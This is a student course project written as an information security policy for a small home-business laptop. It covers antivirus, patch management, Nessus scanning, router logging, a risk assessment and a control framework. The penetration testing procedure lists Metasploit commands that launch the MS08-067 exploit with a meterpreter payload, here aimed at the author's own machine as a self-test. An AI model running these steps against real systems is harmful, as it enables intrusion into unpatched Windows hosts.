Information Security Policy Document

Vantage Point Computing
Benjamin Dahl
Contents
Information Security Policy Document ..........................................................................................................................3 Scope .........................................................................................................................................................................3 Overall objectives ......................................................................................................................................................3 Standards .......................................................................................................................................................................5 Antivirus ....................................................................................................................................................................5 Penetration Testing .................................................................................................. Error! Bookmark not defined.7 Patch Management ...................................................................................................................................................8 Vulnerability Scanning ...............................................................................................................................................9 Firewall/Router logging...........................................................................................................................................10 Procedures ...................................................................................................................................................................11 Antivirus Procedure .................................................................................................................................................11 Penetration Testing Procedure ................................................................................................................................29 Patch Management Procedure ...............................................................................................................................43 Vulnerability Scanning Procedures ..........................................................................................................................50 Firewall/Router logging Procedure .........................................................................................................................62 Evidence .......................................................................................................................................................................65 Antivirus ..................................................................................................................................................................65 Penetration Testing .................................................................................................................................................71 Patch Management .................................................................................................................................................72 Vulnerability Scanning .............................................................................................................................................74 Firewall/Router logging...........................................................................................................................................75 Corrected Risk Assessment ..........................................................................................................................................76 Corrected Control Framework .....................................................................................................................................79
IS533 Course Project | Vantage Point Computing
Information Security Policy Document

Information is the most critical asset in any organization. Proprietary data, information, and knowledge are just as valuable to a business as tangible assets. As such, information needs to be suitably protected and secured in a fashion as rigorous as that of other business assets. This is especially important with the increasing number of vulnerabilities and threats and the interconnected nature of the business environment. Information exists in a multitude of formats; information can be digital or analog, and tangible or nontangible. Regardless of the form the information takes, controls must be followed in order to secure information. The goal of information security is to protect information from a varying array of threats to maximize return on investment, minimize or negate risk, and ensure business continuity. This goal is achieved by implementing a suitable set of controls which include: policies, processes, and procedures. These controls are concerned with both hardware, software, and data aspects and need to be created, implemented, monitored, and reviewed. If necessary, these controls must be revised, amended, or replaced to adhere to the primary goal of information security. In order to fully adhere to the security and business tenets of the business, this must be done in conjunction with other business units.
Scope
The scope of this information security policy document is limited to the Vantage Point Computing business network (SPACEBRIDGE), specifically the laptop (WHEELJACK) which is the primary network connection device.
Overall objectives
The importance of information sharing is critical in the increasingly interconnected business environment. Security of this information is paramount because information loses value when it is compromised. If the hardware, software, or information is compromised in any way, full availability cannot be ensured. In light of the nature of the business, a laptop must be available to ensure continued business operations. Coupled with the sensitive information contained on the laptop, security controls must be followed by all users in order to reduce risk and maximize output. All users will be required to attend training for all policies, procedures, and standards in this document, along with certifying that they have read and understand this document. The following standards will be covered in this document: Antivirus: BitDefender Game Safe, real-time Antivirus protection Penetration Testing: Metasploit Patch Management: Vulnerability Scanning: Firewall/Router Logging:
Vantage Point Computing |IS533 Course Project
Vantage Point Computing is concerned with the security of all assets, whether physical or non-physical. As such, the following requirements must be adhered to: Compliance with all information presented in this document; including, but not limited to, current version updates of all software. Compliance with instructor agreed upon contractual requirements
Vantage Point Computing considers increased awareness and continued education to be of the utmost importance. The following vendors and organizations provide this security education, training and awareness: CompTIA [http://www.comptia.org/] DePaul University [http://www.depaul.edu] DarkReading [http://www.darkreading.com/] US-Cert [http://www.us-cert.gov/] NIST [http://csrc.nist.gov/]
Vantage Point Computing recommends the A+, N+, and Security+ training from CompTIA. DePaul University offers security focused classes taught by James Krev; Vantage Point Computing recommends all of these classes (specifically IS433 and IS533). US-CERT, NIST, and DarkReading all provide information, updates, and articles based on current security topics, issues, and threats. These resources should be utilized on a weekly basis.
Standards
Antivirus
Description:
BitDefender Game Safe [BitDefender Game Safe] Protects systems in real time from viruses, spyware, and malware. Includes software firewall to control application access to the Internet. Includes Gamer Mode which allows preferred applications to access the Internet without disabling the firewall. Compatible with all Vantage Point Computing systems.
Implementation:
BitDefender Game Safe is installed and configured on all Vantage Point Computing systems. These systems include: WHEELJACK, AUTOBOTS, DECEPTICONS, ASTROTRAIN, HOTROD, SOUNDBEAK, and STARSCREAM. The software is installed through a single installation file located on the Vantage Point Computing server with a multiple user license.
Configuration:
Bit Defender Game Safe is configured with the following options: Antivirus / Antispyware Antiphishing Outlook E-mail protection Gamer Mode o All alerts and notifications are disabled o Real-time Protection set to Permissive o Firewall set to Game Mode to accept incoming connections o Must be enabled with Alt+G hotkey Automatic Updates o Silent update every 5 hours o Does not update if scan is in progress o Does not update if Game Mode is on Full System Scan Daily Scan o Scan all files o Scan for viruses and spyware o Minimize scan window to Sys Tray o Schedule: Daily 3:00am Deep System Scan o Scan all files o Scan for viruses and spyware Vantage Point Computing |IS533 Course Project 5
o o o
Scan archives Scan for hidden files and processes Schedule: Sunday 3:00am
Penetration Testing
Description:
Metasploit [Metasploit] On-demand penetration testing tool. Includes a comprehensive list of exploits and packages for testing Allows the user to test individual exploits. Compatible with all Vantage Point Computing systems.
Implementation:
Metasploit is installed and configured on the WHEELJACK computer, part of the SPACEBRIDGE workgroup. The software is installed through a downloadable installation file located on the Vantage Point Computing server.
Configuration:
Metasploit is configured with the following options: Exploits: windows/smb/ms08_067_netapi (Microsoft Server Service Relative Path Stack Corruption) Target: netapi32.dll (Windows LAN Manager) Payload: windows/meterpreter/bind_tcp (Generic Shell TCP payload) Remote Host: Local IP Address (192.168.0.197)
Patch Management
Description:
Windows Automatic Updates Automatic Updates for the Windows Operating System Compatible with all Windows Systems Microsoft Baseline Security Analyzer [MBSA] On-demand scanning of Microsoft vulnerabilities Allows analysis of system based on manufacturer specifications Compatible with all Windows Systems
Implementation:
Windows Automatic Updates are configured on the WHEELJACK computer, part of the SPACEBRIDGE workgroup. MBSA is installed and configured on the WHEELJACK computer, part of the SPACEBRIDGE workgroup. The software is installed through a downloadable installation file located on the Vantage Point Computing server.
Configuration:
Windows Automatic Updates are configured with the following options: Automatic Every day at 2:00 am MBSA is configured with the following options: Computer: SPACEBRIDGE\WHEELJACK Check for Windows administrative vulnerabilities Check for weak passwords Check for IIS administrative vulnerabilities Check for SQL administrative vulnerabilities Check for security updates
Vulnerability Scanning
Description:
Tenable Nessus 4.0.1 [Nessus] Cutting edge Patch, Configuration, and Content Auditing Constantly updated vulnerability library Network Assessment Determine weak points in system security
Implementation:
Tenable Nessus is installed and configured on the WHEELJACK computer, part of the SPACEBRIDGE workgroup. The software is installed through a downloadable installation file located on the Vantage Point Computing server. The software is installed through a single installation file located on the Vantage Point Computing server.
Configuration:
Nessus is configured with the following options: Network: Loopback (127.0.0.1) Default Scan Policy: Options: o Safe Checks Enabled o Log details on the server Plugins: o o o o o Backdoors Peer-to-Peer File Sharing Windows Windows: Microsoft Bulletins Windows: User Management
Firewall/Router Logging
Description:
Logging is enabled for the D-Link DGL4300 Router [DGL4300] Primary link between all Vantage Point Computing systems and the Internet. Provides 108Mbps 802.11g Wireless Connectivity. 4 Gigabit Ethernet Ports. 1 WAN Port Logging enabled to assess incidents Compatible with all Vantage Point Computing systems.
Implementation:
The DGL4300 router is configured as the primary router for Vantage Point Computing.
Configuration:
DGL4300 logging configured with the following options: What to View : o Firewall & Security o System o Router Status View Levels : o Critical o Warning o Informational
10
Procedures
Antivirus Procedure
1. 2. Execute bitdefender_gamesafe.exe. Click Next
11
3.
Click Next
4.
Select "I accept the License Agreement" then click Next
12
5.
Click Next
6.
Click Install
13
7.
Deselect "Run a quick system scan (may require reboot)" and "Schedule a full system scan every day at 2 AM then click Next
8.
Allow BitDefender to update and then click OK
14
9.
Click Next
15
10. Click Finish
11. Click Yes to restart the computer and apply changes.
16
12. After the system restarts, select "My computer is connected to a home, office or trusted network" and click OK.
17
13. After BitDefender loads, click Settings.
18
14. Click Custom Level.
19
15. Configure settings as follows and click OK.
20
16. Select Scan tab and then click New Task.
21
17. Configure the settings as follows and click Custom.
22
18. Configure settings as follows and click OK.
23
19. Select Scan Path tab and configure as follows:
24
20. Select Scheduler tab and configure as follows, then click OK.
25
21. Select Firewall option on the left and configure as follows:
26
22. Click Advanced, configure as follows and then click OK.
27
23. Click Close.
24. Close BitDefender.
28
Penetration Testing Procedure

1. Execute framework-3.2.exe.
2.
Click Next.
3.
Click I Agree. Vantage Point Computing |IS533 Course Project 29
4.
Click Next
5.
Click Install 30
6.
Click Yes
7.
Click I Agree
31
8.
Click Next
9.
Click Install 32
10. Click I Agree
11. Click Next Vantage Point Computing |IS533 Course Project 33
12. Click Next
13. Click Finish 34
14. Click Next
15. Click Next Vantage Point Computing |IS533 Course Project 35
16. Click Finish
17. Click Finish 36
18. Click Window 19. Click Console
37
20. Type show exploits and hit Enter on your keyboard
21. The exploits will display
22. Type use windows/smb/ms08_067_netapi and hit Enter on your keyboard
38
23. Type show payloads and hit Enter on your keyboard
24. Type set payload windows/meterpreter/bind_tcp and hit Enter on your keyboard Vantage Point Computing |IS533 Course Project 39
25. Type set rhost XXX.XXX.XXX.XXX.XXX where XXX.XXX.XXX.XXX is the local IP address of the machine being tested. The local IP address of WHEELJACK is 192.168.0.197.
40
26. Hit Enter on your keyboard
27. Type exploit and hit Enter on your keyboard
28. 29. The vulnerability will be triggered and results will be displayed. Vantage Point Computing |IS533 Course Project 41
30. Click the red X to close the Metasploit Console
31. Click the red X to close Metasploit
42
Patch Management Procedure

1. Double-click MBSASetup-x86-EN.msi
2.
Click Next
3.
Select I accept the license agreement and click Next Vantage Point Computing |IS533 Course Project 43
4.
Click Next
5. 6.
Click Install Click Ok in the Confirmation Window 44 IS533 Course Project | Vantage Point Computing
7.
Launch Microsoft Baseline Security Analyzer 2.1 from your desktop
8.
Click Scan a computer
9.
Click Start Scan Vantage Point Computing |IS533 Course Project 45
10. Review the outputs of the scan. 11. Click OK 46
12. Click the red X to close MBSA. 13. Click Start in the Windows Taskbar 14. Click Control Panel
47
15. Double-click Security Center
16. Click Turn on Automatic Updates
17. Click Automatic Updates in the Manage security settings for: section 48
18. 19. 20. 21.
Select Automatic Change Every day time to 2:00am Click OK Click the red X to close Windows Security Center
49
Vulnerability Scanning Procedures

1. Double-click Nessus-4.0.1-i386.msi
2.
Click Next
3.
Select I accept the license agreement and click Next 50 IS533 Course Project | Vantage Point Computing
4.
Click Next
5.
Click Next
51
6.
Click Install
7.
Click Finish Launch Nessus Server Manager from your desktop 52
8.
Verify the Nessus Server is running, or click Start Server
9.
Click the Red X to close Nessus Server Manager
53
10. Launch Nessus Client from your desktop
11. Click + In the Networks to scan: section
54
12. Type 127.0.0.1 in Host name: and click Save
13. Click Connect in the bottom left Vantage Point Computing |IS533 Course Project 55
14. Click Connect
56
15. Click + in the Select a scan policy: section
16. Enter the desired policy name in the Policy name: section Vantage Point Computing |IS533 Course Project 57
17. Click the Options tab
18. Check Safe Checks 19. Check Log details of the scan on the server 20. Click the Plugins tab 58 IS533 Course Project | Vantage Point Computing
21. 22. 23. 24. 25. 26.
Check Backdoors Check Peer-To-Peer File Sharing Check Windows Check Windows : Microsoft Bulletins Check Windows : User Management Click Save
59
27. Select the policy that was created
28. Click Scan Now
60
29. Review the Report details 30. Click Export...
31. Choose the location and File name for your report and click Save 32. Click the Red X to close Nessus Vantage Point Computing |IS533 Course Project 61
Firewall/Router Logging Procedure

1. 2. Open web browser (Internet Explorer or Firefox) Enter the web address (192.168.0.1)
3. 4.
Enter your router password Click Log In
62
5.
The Status page will load
6.
Click Logs in the left menu
63
7. 8. 9. 10. 11. 12. 13. 14.
Check the Firewall & Security checkbox Check the System checkbox Check the Router Status checkbox Check the Critical checkbox Check the Warning checkbox Check the Informational checkbox Click Apply Log Settings Now Click Ok in the Confirmation window
64
Evidence Antivirus
1. 2. Verify PC SECURITY, NETWORK SECURITY, and IDENTITY CONTROL are all Protected Click History.
Vantage Point Computing |IS533 Course Project Evidence
65
3.
Select the most recently completed scan.
4.
Right-click the scan and click Open.
5.
Click "View Scan Log" 66 EvidenceIS533 Course Project | Vantage Point Computing
6.
Review .xml file (C:\Documents and Settings\All Users\Application Data\BitDefender\Desktop\Profiles\Logs\full_scan\1241971935_1_02.xml) for any issues.
7.
Close BitDefender Log File.
67
8.
Select Firewall.
9.
Review Firewall events.
68
EvidenceIS533 Course Project | Vantage Point Computing
10. Click Update. 11. Review Update Events.
69
12. Click OK.
13. Close BitDefender.
70
Penetration Testing
1. View the output of the Metasploit Vulnerability Test.
2.
Verify that the exploit completed, but no session was created
71
Patch Management
1. Review the Automatic Updates section of Windows Security Center
2. 3.
Open the .mbsa file from %userprofile%\SecurityScans Verify update log
72
4. 5. 6.
Visual Studio was removed from WHEELJACK SQL services have been stopped. The Office Service pack was installed, but is not recognized.
73
Vulnerability Scanning
1. Open the Nessus report file
2.
Verify there are no Medium or High vulnerabilities.
74
Firewall/Router logging
4. Review the Log Details section of the Router page
75
Corrected Risk Assessment

I. Introduction
The purpose of this assessment is to observe and address risks to the WHEELJACK laptop operating on the Spacebridge network. Performing this risk assessment will allow threat-sources and actions to be discovered, quantified, and addressed later in a more effective matter. Performing this assessment will ultimately allow this business critical system to be hardened to maximize availability. The scope of this assessment is concerned with a single portable system, WHEELJACK. This system is an Averatec EV3715-EH1 AMD-based laptop running Windows XP Professional Service Pack 3. This machine connects to three different networks on a regular basis: Spacebridge (Home Office), HALPNT (Work), and DePaul. The system only has one user, and there are no additional administrators or guest accounts. II. Risk Assessment Approach
The only member of the risk assessment team is the business owner/custodian Ben Dahl. There are two techniques that were used to gather information for the assessment. Tenable Nessus v3.2.1.1 (build 2G301_Q) was used to scan the machine for open ports and vulnerabilities. In addition to this, Microsoft Baseline Security Analyzer v2.1 was used to determine if there were any missing Microsoft system patches. The risk scale for this assessment was built using a risk scale of high, medium, and low. High risk denotes a threat that has a high likelihood of happening and represents a critical system threat. This may include missing critical updates, vulnerabilities that have not been patched, and open firewall ports. Medium risk denotes a threat that could happen, but does not represent a critical system threat. This may include missing non-critical updates, and software updates. Low risk denotes a threat that has a low likelihood of happening and represents an inconvenience. This may include lack of surge protection, improper documentation, and low-priority updates. III. System Characterization
This document is concerned with the WHEELJACK laptop and the local hardware and software utilized by this machine and the primary business owner/data custodian Ben Dahl. The primary mission of this system is portable completion of work and school projects, technological tether. This system is also used for Internet access, desktop publishing, data storage, and music management. The system interfaces to the SPACEBRIDGE, HALPNT, and DePaul networks via wired, wireless, and TightVNC connections. The system contains personal data (contacts, media, and university work), business information (project documents), cookies, and the following: Hardware: Averatec EV3715-EH1 AMD Sempron 3000 (1.8g) 1gb Corsair DDR3200 Toshiba MK8025GAS 80gb Atheros AR5212 A/B/G Comcast Surfboard D-Link DGL4300 Linksys WRT54GL Patriot Xporter XT 16gb
76
Corrected Risk AssessmentIS533 Course Project | Vantage Point Computing
Software: Windows XP Pro SP3 Office Pro 2007 Enterprise Adobe Reader 9.1 Mozilla Firefox 3.0.8 Acronis True Image TrueCrypt DDWRT Linksys Firmware
The system has been classified as Business Critical with confidential data sensitivity. IV. Threat Statement Threat Source Machine could be lost by user. The system could be compromised by an attacker. A natural disaster could compromise the availability of the system. System could be stolen by third party Missing Updates Vulnerability Unsecure Networks Remote Connection Vulnerability Data Compromise or Corruption
Threat Action System could be left at DePaul System could be left at Harris Associates System could be left in public Unauthorized access to sensitive information Power outage could cause system to be unusable Flood could lead to destruction of machine Tornado could lead to destruction of machine System could be stolen if left in public System could be stolen if left unsecured System could be compromised by viruses or malware DePaul or HALPNT network could become compromised and corrupt system System could be compromised if connected to unsecure VPN While using thumbdrives, information transmitted could become compromised or corrupted
V. Risk Assessment Results Observation 1: System is vulnerable due to missing operating system or software updates or incomplete installation System is missing 33 security updates which, if discovered by an attacker, could be used to compromise confidentiality, integrity, or availability of the system. Existing controls: System is protected by hardware and software firewall. System is protected by strong passwords. System is backed up on a regular basis. Nessus and MBSA are used for vulnerability and patch analysis. Likelihood is low - System has been operational for approximately two years without issue. System is only powered on approximately three hours a day. Windows Service Pack 3 was installed on machine soon after release which decreased likelihood of issue. Magnitude of impact is low - System can be repaired inexpensively, data is encrypted and backed up. Risk rating is low - Low likelihood and low magnitude of impact along with cost/benefit makes this a low risk Recommend implementing automatic updates for Windows and Microsoft Office, as well as running more frequent Nessus and MBSA scans. Observation 2: Windows RDP Terminal Service is not run through SSL
Vantage Point Computing |IS533 Course Project Corrected Risk Assessment
77
Windows Remote Desktop Protocol is vulnerable because it is not run through secure socket layer transport protocols. If discovered, this Nessus determined "medium" risk could be used to intercept secure communications. Existing controls are firewalls, routers, and the TOR anonymity network. Low likelihood - RDP is only used locally so the likelihood of interception would require an attacker to be on the local network. Low impact - No confidential transactions are processed through RDP. Low risk - Secure VPN tunnels are used for internet remote access, this is a low risk. Recommend implementing ssl solution for RDP.
Observation 3: Data loss due to lost or stolen system or USB drive System or information can be compromised due to loss or theft Existing Controls: TrueCrypt for USB drive and system drive encryption. StuffBak registration for system in the event of loss or theft. System is personalized and would not easily be moved to third-parties. System has strong BIOS and operating system passwords. Additional administrator and guest accounts have been disabled. Likelihood is medium due to the unpredictable nature of loss or theft Magnitude of impact is low - Information on USB drives and system is automatically backed up differentially on a twice weekly basis Risk rating is low - Should the USB device or laptop be compromised, the information is still available and protected. The hardware is easily replaced at an acceptable cost and spare systems are available. Recommended Controls: Implement password expiration policy and more frequent backups.
Observation 4: System compromised due to malware. VI. System can become compromised in terms of confidentiality, integrity, or availability due to malware. Existing controls: Full and differential Acronis True Image backups. Hardened system with very few open ports and vulnerabilities. Router and system logging is implemented for auditing purposes. Likelihood is medium - Malware is everywhere, but system does not connect to any unprotected networks. Impact is low - In the event the system is compromised, no more than 48hrs of work will be lost. Risk is low - Based on risk matrix, risk is low. Recommended controls: Implement antivirus solution. Summary Risk Level Low Low Recommendations Implement Automatic Updates and frequent Nessus and MBSA scans Implement Microsoft RDP SSL update Implement more frequent backups and password expiration policy Implement antivirus/antimalware Comments This requires minimal user input, and can be automated. This is a onetime setup update, but will not be implemented due to TOR and VNC. All information must be completely secured. This is a low risk, but protection is a necessity.
Observation System is vulnerable because of missing updates or software Microsoft RDP SSL Vulnerability Data loss due to lost or stolen system or USB drive. System compromised due to viruses or malware. 78
Low Low
Corrected Risk AssessmentIS533 Course Project | Vantage Point Computing
Corrected Control Framework

Control Objective #1 5.1 Information Security Policy To provide management direction and support for information security in accordance with business requirements and relevant laws and regulations.
Risk Mitigation: To ensure that management has identified the information security program requirements and that employees understand the programs intent. Control Name Control Description Testing Steps Evidence Requested Point of Contact
Control 1.1 Information Security Policy Document Annual
An information security policy document is approved by management, published and communicated to all employees and relevant external parties.
1. Obtain a copy of the information security policy document and verify that it defines the programs intent, compliance with legislation, commitment to security awareness and training, a brief explanation of the security standards and procedures.
1. Provide a copy of the information security policy document.
Ben
Vantage Point Computing |IS533 Course Project Corrected Control Framework
79
Control Objective #2: 10.4.1 Antivirus Software Detection, prevention, and recovery controls to protect against malicious code and appropriate user awareness procedures are implemented. Risk Mitigation: To prevent the introduction of malicious software that could negatively impact the organizations information systems. Control Name Control Description Testing Steps Evidence Requested Point of Contact
Control 2.1 Antivirus Standard
An antivirus standard is documented and implemented to provide a consistent and uniform process for updating servers with the latest virus definition files on a predefined schedule
1. Obtain a copy and examine the malicious software standard and the related procedures to determine if they are being followed.
1a. Provide a copy of the malicious software standard and procedures.
Ben
1b. Provide a copy virus definition update schedule for virus definition updates.
Weekly
2. Test the system to determine if the virus updates were applied according to the procedures outlined and implemented in a timely manner.
2. Provide a system generated list or report that depicts when the last virus definition updates were implemented.
80
Corrected Control FrameworkIS533 Course Project | Vantage Point Computing
Control Objective #3: 15.2.2 Penetration Testing Timely information about technical vulnerabilities of information systems being used should be obtained, the organization's exposure to such vulnerabilities evaluated, and appropriate measures taken to address the associated risk.
Risk Mitigation:
To provide protection from malicious code by offensively testing systems for exploits and vulnerabilities.
Control Name
Control Description
Testing Steps
Evidence Requested
Point of Contact Ben
Control 3.1 Penetration Testing Standard
A penetration testing standard is documented and implemented to assess and quantify critical system exploits and vulnerabilities.
1. Obtain a copy of the Penetration Testing Standard 2. Review the latest penetration test results.
1. Provide a copy of the penetration test standard and procedures.
2. Provide a copy of the results from the penetration test.
Quarterly
3. Provide a report outlining potential fixes for issues discovered.
81
Control Objective #4: 12.6 Patch Management
To reduce risks resulting from exploitation of published technical vulnerabilities. Risk Mitigation:
To ensure that systems are updated with the newest patches for known vulnerabilities. Control Name Control Description Testing Steps Evidence Requested Point of Contact Ben
Control 4.1 Patch Management Standard
A patch management standard is documented and implemented to ensure that systems have the most current patches installed.
1. Obtain a copy and examine the patch management standard and the related procedures to determine if they are being followed.
1. Provide a copy Patch Management Standard.
Weekly
2. Test the system to determine if the patch updates were applied according to the procedures outlined and implemented in a timely manner.
2. Provide a print screen of the patch management configuration. Provide a print screen that shows the most recent system patches.
82
Control Objective #5: 15.2.2 Vulnerability Scanning Information systems should be regularly checked for compliance with security implementation standards. Risk Mitigation: To ensure that assets remain protected from known exploits or vulnerabilities that may compromise or otherwise harm an asset.
Control Name
Control Description
Testing Steps
Evidence Requested
Point of Contact Ben
5.1 - Technical Compliance Standard
A technical compliance standard is documented and implemented to describe the process that should be taken to determine if vulnerabilities are present, and how to become compliant should events be found.
1.
Obtain a copy of the standard. Obtain the latest scan reports.
1.
2.
2.
Provide a copy of the standards and procedures. Provide a copy of the outputs of the vulnerability scan. Provide a copy of the resulting report that states that vulnerabilities have been corrected.
Weekly
83
Control Objective #6: 10.10.1 Firewall & Router Logging
Audit logs recording user activities, exceptions, and information security events should be produced and kept for an agreed period to assist in future investigations and access control monitoring.
Risk Mitigation: To ensure that system activities and traffic
Control Name
Control Description
Testing Steps
Evidence Requested
Point of Contact
Ben Control 6.1 - Audit Logging Router and firewall logging are enabled to monitor and record all activity on the network to ensure security and safety of corporate and personal assets. 1. 2. 3. Obtain a copy of the standard. Enable router and firewall logging. If an event is recorded, review logs immediately. Review all logs on a weekly basis. Maintain redundant log copies. 1. Obtain a copy of the standard and procedures. Provide log copies. Maintain a secure log backup.
2.
3.
4. 5. Daily / Weekly
84

Information Security Policy Document

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Information Security Policy Document

Uploaded by

Copyright:

Available Formats

Vantage Point Computing

IS533 Course Project | Vantage Point Computing